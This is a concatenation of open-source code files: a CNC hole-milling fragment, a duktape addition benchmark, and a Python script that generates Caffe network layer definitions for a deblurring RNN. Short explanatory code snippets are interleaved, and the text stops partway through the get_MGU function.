"args" : [
width,
data['unit'] ,
height,
radius
]
}
}
)
# call static method, note: it's important to send current object as well to method
self.helicalRoundedRecHole( self,
xy=xy,
ab=[self.center_offset_x, self.center_offset_y],
wh=[width, height],
td=self.tool_dia,
r=radius,
f=self.lin_move_xy,
depth=[self.depth_total, self.depth_step],
contour=self.contour,
dir=self.dir
)
pass
pass
# --- __init__.py (pnarvor/nephelae_mapping, BSD-3-Clause) ---
from . import database
from . import gprmapping
# --- tests/perf/test-assign-add.py (jacobmarshall-etc/duktape, MIT) ---
def test():
a = 10
b = 20
i = 0
while i < 1e7:
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
t = a + b; t = a + b; t = a + b; t = a + b; t = a + b
i += 1
test()
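The same unrolled-addition workload can also be timed with the standard `timeit` module; a hypothetical harness (not part of the original perf test) might look like:

```python
import timeit

# Hypothetical harness (not part of the original test): time 100 unrolled
# "t = a + b" statements per run, repeated 1000 times.
stmt = "t = a + b\n" * 100
setup = "a = 10\nb = 20"
elapsed = timeit.timeit(stmt, setup=setup, number=1000)
print(f"{elapsed:.6f} s for 1000 x 100 additions")
```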
# --- scripts/pyproto.py (tushar00jain/cvpr18_rnn_deblur_matcaffe, MIT) ---
import os
import sys
def get_pad(name='',bottom='',top='',pad_h=0,pad_w=0):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Pad'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' pad_param {\n'
ss += ' pad_h:'+str(pad_h)+'\n'
ss += ' pad_w:'+str(pad_w)+'\n'
ss+= ' }\n}\n'
return ss
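get_pad and the helpers that follow all share one pattern: concatenate prototxt key/value lines into a string and return it. A minimal standalone sketch of that pattern (the `make_layer` helper is hypothetical, not part of this script):

```python
def make_layer(name, layer_type, bottom, top, param_block=None):
    # Hypothetical helper: build one Caffe prototxt layer block line by
    # line, the same way get_pad/get_resize above do.
    ss = 'layer{\n'
    ss += ' name:"' + name + '"\n'
    ss += ' type:"' + layer_type + '"\n'
    ss += ' bottom:"' + bottom + '"\n'
    ss += ' top:"' + top + '"\n'
    if param_block:
        key, kv = param_block
        ss += ' ' + key + ' {\n'
        for k, v in kv.items():
            ss += '  ' + k + ':' + str(v) + '\n'
        ss += ' }\n'
    ss += '}\n'
    return ss

txt = make_layer('pad1', 'Pad', 'data', 'data_pad',
                 ('pad_param', {'pad_h': 2, 'pad_w': 2}))
print(txt)
```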
def get_resize(name='',bottom='',top='',resize_type='',resize_ratio=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Resize'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' resize_param {\n'
ss += ' type:'+resize_type+'\n'
ss += ' resize_ratio:'+str(resize_ratio)+'\n'
ss+= ' }\n}\n'
return ss
def get_slice(name='',bottom='',top='',slice_point=1,slice_dim=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Slice'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
if type(top) == list:
for t in top:
ss += ' top:"'+t+'"\n'
else:
ss += ' top:"'+top+'"\n'
ss += ' slice_param {\n'
ss += ' slice_dim:'+str(slice_dim)+'\n'
if type(slice_point) == list:
for s in slice_point:
ss += ' slice_point:'+str(s)+'\n'
    else:
        ss += ' slice_point:'+str(slice_point)+'\n'
ss+= ' }\n}\n'
return ss
def get_crop(name='',bottom='',top='',croptype='',crop_w=0,crop_h=0,point_fix_w=0,point_fix_h=0):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Crop'+'"\n'
if type(bottom) == list:
for b in bottom:
ss += ' bottom:"'+b+'"\n'
else:
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' crop_param {\n'
ss += ' type:'+croptype+'\n'
ss += ' crop_w:'+str(crop_w)+'\n'
ss += ' crop_h:'+str(crop_h)+'\n'
ss += ' point_fix_w:'+str(point_fix_w)+'\n'
ss += ' point_fix_h:'+str(point_fix_h)+'\n'
ss+= ' }\n}\n'
return ss
def get_flatten(name='',bottom='',top=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Flatten'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n}\n'
return ss
def get_l2(name='',bottom='',top=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'L2Norm'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n}\n'
return ss
def get_dropout(name='',bottom='',top='',dropout_ratio=0.5):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Dropout'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' dropout_param {\n'
ss += ' dropout_ratio:'+str(dropout_ratio)+'\n'+' }\n}\n'
return ss
def get_fc(name='',bottom='',top='',numoutput=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'InnerProduct'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n\
lr_mult: 1\n \
decay_mult: 1\n }\n param {\n \
lr_mult: 2\n \
decay_mult: 0\n }\n'
ss += ' inner_product_param {\n'
ss += ' num_output:'+str(numoutput)+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_eltwise(name='',bottom='',top='',typename='SUM'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Eltwise'+'"\n'
for b in bottom:
ss += ' bottom:"'+b+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' eltwise_param {\n operation:'+typename+'\n }\n}\n'
return ss
def get_concat(name='',bottom='',top='',concat_dim=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Concat'+'"\n'
for b in bottom:
ss += ' bottom:"'+b+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' concat_param {\n'
ss += ' concat_dim:'+str(concat_dim)+'\n'
ss += ' }\n'
ss+='}\n'
return ss
def get_bn(name='',bottom='',top='',use_global_stas=0):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'BatchNorm'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
ss += ' lr_mult: 0\n }\n'
ss += ' param {\n'
ss += ' lr_mult: 0\n }\n'
ss += ' param {\n'
ss += ' lr_mult: 0\n }\n'
ss += ' batch_norm_param {\n'
ss += ' use_global_stats:'+str(use_global_stas)+'\n'
ss += ' }\n'
ss+='}\n'
return ss
def get_power(name='',bottom='',top='',scale=1,shift=0,power=1):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Power'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' power_param {\n'
ss += ' scale:'+str(scale)+'\n'
ss += ' shift:'+str(shift)+'\n'
ss += ' power:'+str(power)+'\n'
ss += ' }\n'
ss+='}\n'
return ss
def get_domaintransform(name='',bottom='',top=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'DomainTransform'+'"\n'
for b in bottom:
ss += ' bottom:"'+b+'"\n'
ss += ' top:"'+top+'"\n'
ss+='}\n'
return ss
def get_pool(name='',bottom='',top='',pooltype='',ksize=2,pad=0,stride=2):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Pooling'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' pooling_param {\n'
ss += ' pool:'+pooltype+'\n'
if type(ksize) == list:
ss += ' kernel_h:'+str(ksize[0])+'\n'
ss += ' kernel_w:'+str(ksize[1])+'\n'
else:
ss += ' kernel_size:'+str(ksize)+'\n'
if type(pad) == list:
ss += ' pad_h:'+str(pad[0])+'\n'
ss += ' pad_w:'+str(pad[1])+'\n'
else:
ss += ' pad:'+str(pad)+'\n'
if type(stride) == list:
ss += ' stride_h:'+str(stride[0])+'\n'
ss += ' stride_w:'+str(stride[1])+'\n'
else:
ss += ' stride:'+str(stride)+'\n'
ss += ' }\n}\n'
return ss
def get_active(name='',bottom='',top='',typename='PReLU'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+typename+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
if typename == 'PReLU':
ss += ' prelu_param {\n'
ss += ' filler {\n\
type: "gaussian"\n\
std: 0.03\n }\n }\n'
ss+='}\n'
return ss
def get_conv(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Convolution'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_w)>0:
ss+=' name:"'+paramname_w+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' convolution_param {\n'
ss += ' num_output:'+str(numoutput)+'\n'
if type(ksize) == list:
ss += ' kernel_h:'+str(ksize[0])+'\n'
ss += ' kernel_w:'+str(ksize[1])+'\n'
else:
ss += ' kernel_size:'+str(ksize)+'\n'
if type(pad) == list:
ss += ' pad_h:'+str(pad[0])+'\n'
ss += ' pad_w:'+str(pad[1])+'\n'
else:
ss += ' pad:'+str(pad)+'\n'
if type(stride) == list:
ss += ' stride_h:'+str(stride[0])+'\n'
ss += ' stride_w:'+str(stride[1])+'\n'
else:
ss += ' stride:'+str(stride)+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_deconv(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b=''):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'Deconvolution'+'"\n'
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_w)>0:
ss+=' name:"'+paramname_w+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' convolution_param {\n'
ss += ' num_output:'+str(numoutput)+'\n'
if type(ksize) == list:
ss += ' kernel_h:'+str(ksize[0])+'\n'
ss += ' kernel_w:'+str(ksize[1])+'\n'
else:
ss += ' kernel_size:'+str(ksize)+'\n'
if type(pad) == list:
ss += ' pad_h:'+str(pad[0])+'\n'
ss += ' pad_w:'+str(pad[1])+'\n'
else:
ss += ' pad:'+str(pad)+'\n'
if type(stride) == list:
ss += ' stride_h:'+str(stride[0])+'\n'
ss += ' stride_w:'+str(stride[1])+'\n'
else:
ss += ' stride:'+str(stride)+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
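The deconvolution settings used throughout this script follow the standard Caffe output-size relation `out = (in - 1) * stride - 2 * pad + ksize`; in particular, ksize=4/stride=2/pad=1 (the combination used by get_res_unit_upsample2 below) exactly doubles the spatial size:

```python
def deconv_out_size(n_in, ksize, stride, pad):
    # Caffe Deconvolution output size: (in - 1) * stride - 2 * pad + ksize
    return (n_in - 1) * stride - 2 * pad + ksize

print(deconv_out_size(32, ksize=4, stride=2, pad=1))  # 64: doubles 32
print(deconv_out_size(33, ksize=4, stride=2, pad=1))  # 66: doubles 33
```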
def get_conv_active(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_conv(name=name,bottom=bottom,top=top,ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_active(name=name+'_active',bottom=top,top=top,typename=active)
return s
def get_deconv_active(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_deconv(name=name,bottom=bottom,top=top,ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_active(name=name+'_active',bottom=top,top=top,typename=active)
return s
def get_sprnn(name='',bottom='',top='',paramname_w='',paramname_b='',horizontal='true',reverse='false',restrict_w=-1,active='LINEAR'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'SpatialRecurrent'+'"\n'
if type(bottom) == list:
ss += ' bottom:"'+bottom[0]+'"\n'
ss += ' bottom:"'+bottom[1]+'"\n'
else:
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_w)>0:
ss+=' name:"'+paramname_w+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' spatialrecurrent_param {\n'
ss += ' horizontal:'+horizontal+'\n'
ss += ' reverse:'+reverse+'\n'
ss += ' restrict_w:'+str(restrict_w)+'\n'
ss += ' active:'+active+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
def get_gaternn(name='',bottom='',top='',num_output=1,use_wx='false',use_wh='false',use_bias='false',paramname_wx='',paramname_wh='',paramname_b='',
horizontal='true',reverse='false',restrict_w=-1,restrict_g=1,use_x_gate='true',use_new_fix='true',active='LINEAR'):
ss ='layer{\n'
ss += ' name:"'+name+'"\n'
ss += ' type:"'+'GateRecurrent'+'"\n'
if type(bottom) == list:
ss += ' bottom:"'+bottom[0]+'"\n'
ss += ' bottom:"'+bottom[1]+'"\n'
else:
ss += ' bottom:"'+bottom+'"\n'
ss += ' top:"'+top+'"\n'
ss += ' param {\n'
if len(paramname_wx)>0:
ss+=' name:"'+paramname_wx+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_wh)>0:
ss+=' name:"'+paramname_wh+'"\n'
ss += ' lr_mult: 1\n'
ss += ' decay_mult: 1\n }\n'
ss += ' param {\n'
if len(paramname_b)>0:
ss+=' name:"'+paramname_b+'"\n'
ss += ' lr_mult: 2\n'
ss += ' decay_mult: 0\n }\n'
ss += ' gaterecurrent_param {\n'
ss += ' num_output:'+str(num_output)+'\n'
ss += ' horizontal:'+horizontal+'\n'
ss += ' reverse:'+reverse+'\n'
ss += ' restrict_w:'+str(restrict_w)+'\n'
ss += ' active:'+active+'\n'
ss += ' restrict_g:'+str(restrict_g)+'\n'
ss += ' use_wx:'+use_wx+'\n'
ss += ' use_wh:'+use_wh+'\n'
ss += ' use_bias:'+use_bias+'\n'
ss += ' use_x_gate:'+use_x_gate+'\n'
ss += ' use_new_fix:'+use_new_fix+'\n'
ss += ' weight_filler {\n\
type: "xavier"\n\
std: 0.03\n }\n bias_filler {\n\
type: "constant"\n\
value: 0\n }\n }\n}\n'
return ss
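The GateRecurrent layer propagates hidden state across image rows or columns under a learned gate. As a rough numeric sketch (assumption: the simplified, normalized update `h[t] = (1 - g[t]) * x[t] + g[t] * h[t-1]`; the layer's actual update also depends on the wx/wh weights and the use_* options above):

```python
import numpy as np

def gated_scan(x, g):
    # 1-D gated recurrent scan: h[t] = (1 - g[t]) * x[t] + g[t] * h[t-1]
    h = np.zeros_like(x, dtype=float)
    prev = 0.0
    for t in range(len(x)):
        h[t] = (1.0 - g[t]) * x[t] + g[t] * prev
        prev = h[t]
    return h

h = gated_scan(np.array([1.0, 2.0, 3.0]), np.array([0.0, 0.5, 0.5]))
print(h)  # [1.0, 1.5, 2.25]
```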
def get_conv_bn(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_conv(name=name+'_conv',bottom=bottom,top=name+'_conv',ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_bn(name=name+'_bn',bottom=name+'_conv',top=name+'_bn')
s+=get_active(name=top,bottom=top+'_bn',top=top,typename=active)
return s
def get_deconv_bn(name='',bottom='',top='',ksize=3,numoutput=1,pad=1,stride=1,paramname_w='',paramname_b='',active="ReLU"):
s=get_deconv(name=name+'_deconv',bottom=bottom,top=name+'_deconv',ksize=ksize,numoutput=numoutput,pad=pad,stride=stride,paramname_w=paramname_w,paramname_b=paramname_b)
s+=get_bn(name=name+'_bn',bottom=name+'_deconv',top=name+'_bn')
s+=get_active(name=top,bottom=name+'_bn',top=top,typename=active)
return s
def get_res_unit(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_bn(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch/2,pad=0,stride=1,active=active)
ss+=get_conv_bn(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=1,active=active)
ss+=get_conv_bn(name=name+'_conv1_3',bottom=name+'_conv1_2',top=name+'_conv1_3',ksize=3,numoutput=ch,pad=1,stride=1,active=active)
ss += get_conv_bn(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss += get_eltwise(name=top,bottom=[name+'_input',name+'_conv1_3'],top=top,typename='SUM')
return ss
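get_res_unit wires a three-stage conv branch and a 1x1 projection of the input into an elementwise SUM, i.e. y = proj(x) + F(x). A toy numeric stand-in (assumption: the conv stages are replaced by simple functions purely to show the dataflow):

```python
import numpy as np

def conv_branch(x):
    return 0.25 * x   # stand-in for conv1_1 -> conv1_2 -> conv1_3

def input_projection(x):
    return x          # stand-in for the 1x1 "_input" projection

x = np.full((2, 3), 4.0)
y = input_projection(x) + conv_branch(x)   # Eltwise SUM, as in get_res_unit
print(y)
```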
def get_res_unit_stride2(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_bn(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss+=get_conv_bn(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=2,active=active)
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=2,active=active)
ss += get_eltwise(name=top,bottom=[name+'_input',name+'_conv1_2'],top=top,typename='SUM')
return ss
def get_res_unit_upsample2(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_deconv_bn(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss+=get_deconv_bn(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=4,numoutput=ch,pad=1,stride=2,active=active)
ss += get_deconv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=4,numoutput=ch,pad=1,stride=2,active=active)
ss += get_eltwise(name=top,bottom=[name+'_input',name+'_conv1_2'],top=top,typename='SUM')
return ss
def get_insec_small(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_active(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch/2,pad=0,stride=1,active=active)
ss+=get_conv_active(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=1,active=active)
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_conv1_2'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top,use_global_stas=0)
return ss
def get_insec_stride2_small(name='',bottom='',top='', ch=1,active='PReLU'):
ss=''
ss+=get_conv_active(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch,pad=0,stride=1,active=active)
ss+=get_conv_active(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=3,numoutput=ch,pad=1,stride=2,active=active)
#ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
#ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_conv1_2'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_conv1_2',top= top,use_global_stas=0)
return ss
def get_insec(name='',bottom='',top='', ch=1):
ss=''
ss += get_conv_active(name=name+'_conv1_1',bottom=bottom,top=name+'_conv1_1',ksize=1,numoutput=ch/2,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv1_2',bottom=name+'_conv1_1',top=name+'_conv1_2',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv2_1',bottom=bottom,top=name+'_conv2_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv2_2',bottom=name+'_conv2_1',top=name+'_conv2_2',ksize=3,numoutput=ch,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_1',bottom=bottom,top=name+'_conv3_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_2',bottom=name+'_conv3_1',top=name+'_conv3_2',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_3',bottom=name+'_conv3_2',top=name+'_conv3_3',ksize=3,numoutput=ch,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_1',bottom=bottom,top=name+'_conv4_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_2',bottom=name+'_conv4_1',top=name+'_conv4_2',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_3',bottom=name+'_conv4_2',top=name+'_conv4_3',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv4_4',bottom=name+'_conv4_3',top=name+'_conv4_4',ksize=3,numoutput=ch,pad=1,stride=1,active="ReLU")
ss += get_concat(name=name+'_concat',bottom=[name+'_conv1_2',name+'_conv2_2',name+'_conv3_3',name+'_conv4_4'],top =name+'_concat')
ss += get_conv_active(name=name+'_convall',bottom=name+'_concat',top=name+'_convall',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_convall'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top)
return ss
def get_insec_stride2(name='',bottom='',top='', ch=1):
ss=''
ss += get_conv_active(name=name+'_conv2_1',bottom=bottom,top=name+'_conv2_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv2_2',bottom=name+'_conv2_1',top=name+'_conv2_2',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
ss += get_conv_active(name=name+'_conv3_1',bottom=bottom,top=name+'_conv3_1',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_2',bottom=name+'_conv3_1',top=name+'_conv3_2',ksize=3,numoutput=ch/2,pad=1,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_conv3_3',bottom=name+'_conv3_2',top=name+'_conv3_3',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
ss += get_concat(name=name+'_concat',bottom=[name+'_conv2_2',name+'_conv3_3'],top =name+'_concat')
ss += get_conv_active(name=name+'_convall',bottom=name+'_concat',top=name+'_convall',ksize=1,numoutput=ch,pad=0,stride=1,active="ReLU")
ss += get_conv_active(name=name+'_input',bottom=bottom,top=name+'_input',ksize=3,numoutput=ch,pad=1,stride=2,active="ReLU")
ss += get_eltwise(name=name+'_sum',bottom=[name+'_input',name+'_convall'],top=name+'_sum',typename='SUM')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top)
return ss
def get_INS(name='',bottom='',top='', ch=1):
ss=''
ss += get_insec(name=name+'_ins1',bottom=bottom,top=name+'_ins1',ch=ch)
ss += get_insec(name=name+'_ins2_1',bottom=bottom,top=name+'_ins2_1',ch=ch/2)
    ss += get_insec(name=name+'_ins2_2',bottom=name+'_ins2_1',top=name+'_ins2_2',ch=ch)
ss += get_insec(name=name+'_ins3_1',bottom=bottom,top=name+'_ins3_1',ch=ch)
ss += get_insec(name=name+'_ins3_2',bottom=name+'_ins3_1',top=name+'_ins3_2',ch=ch/2)
ss += get_insec(name=name+'_ins3_3',bottom=name+'_ins3_2',top=name+'_ins3_3',ch=ch)
ss += get_eltwise(name=name+'_sum',bottom=[name+'_ins1',name+'_ins2_2',name+'_ins3_3'],top=name+'_sum',typename='MAX')
ss += get_bn(name=name+'_bn',bottom=name+'_sum',top= top)
return ss
def get_MGU(name='',bottom='',top='',seqlength=0,ksize=3,numoutput=1,shareparam=0):
prefix='MGU_'+name+'_'
ss=''
name={}
for i in range(1,seqlength+1):
name['f'+str(i)]=prefix+'f1'
x=[]
h=[]
f=[]
ft_convht_1=[]
ft_convxt=[]
ft_beforeactive=[]
ht_hat=[]
ht_hat_beforeactive=[]
ht_hat_ftdotht_1=[]
ht_hat_convftdotht_1=[]
ht_hat_convxt=[]
#ht_hat_sum=[]
ht_1_ft=[]
ht_1_ft_dotht_1=[]
ht_ftdotht_hat=[]
for i in range(0,seqlength+1):
x.append(prefix+'x'+str(i))
h.append(prefix+'h'+str(i))
f.append(prefix+'f'+str(i))
ft_convht_1.append(prefix+'f'+str(i)+'_convh'+str(i-1))
ft_convxt.append(prefix + 'f'+str(i)+'_convx'+str(i))
ht_hat.append(prefix+'h'+str(i)+'_hat')
ht_hat_ftdotht_1.append(prefix+'h'+str(i)+'_hat_f'+str(i)+'_dot_h'+str(i-1))
ht_hat_convxt.append(prefix+'h'+str(i)+'_hat_convx'+str(i))
ht_1_ft.append(prefix+'h'+str(i)+'_1_f'+str(i))
ht_1_ft_dotht_1.append(prefix+'h'+str(i)+'_1_f'+str(i)+'_dot_h'+str(i-1))
ht_ftdotht_hat.append(prefix+'h'+str(i)+'_f'+str(i)+'_dot_h'+str(i)+'_hat')
ft_beforeactive.append(prefix+'f'+str(i)+'_beforeactive')
ht_hat_beforeactive.append(prefix+'h'+str(i)+'_hat_beforeactive')
ht_hat_convftdotht_1.append(prefix+'h'+str(i)+'_hat_conv_f'+str(i)+'_dot_h'+str(i-1))
slice_point=[i for i in range(1,seqlength)]
param_f_h_w=''
param_f_h_b=''
param_f_x_w=''
param_f_x_b=''
param_hat_h_w=''
param_hat_h_b=''
param_hat_x_w=''
param_hat_x_b=''
if shareparam:
param_f_h_w=prefix+'f_h_w'
param_f_h_b=prefix+'f_h_b'
param_f_x_w=prefix+'f_x_w'
param_f_x_b=prefix+'f_x_b'
param_hat_h_w=prefix+'hat_h_w'
param_hat_h_b=prefix+'hat_h_b'
param_hat_x_w=prefix+'hat_x_w'
param_hat_x_b=prefix+'hat_x_b'
#slice x
ss += get_slice(name=prefix+'slice',bottom=bottom,top=x[1:],slice_point=slice_point,slice_dim=0)
#get f1 = sigm(conv(x1))
ss += get_conv_active(name=f[1],bottom=x[1],top=f[1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_f_x_w,paramname_b=param_f_x_b,active="Sigmoid")
#get h1_hat = tanh(conv(x1))
ss += get_conv_active(name=ht_hat[1],bottom=x[1],top=ht_hat[1],ksize=ksize,numoutput=numoutput,pad=int(ksize/2),stride=1,paramname_w=param_hat_x_w,paramname_b=param_hat_x_b,active="TanH")
#get h1 = f1.*h1_hat
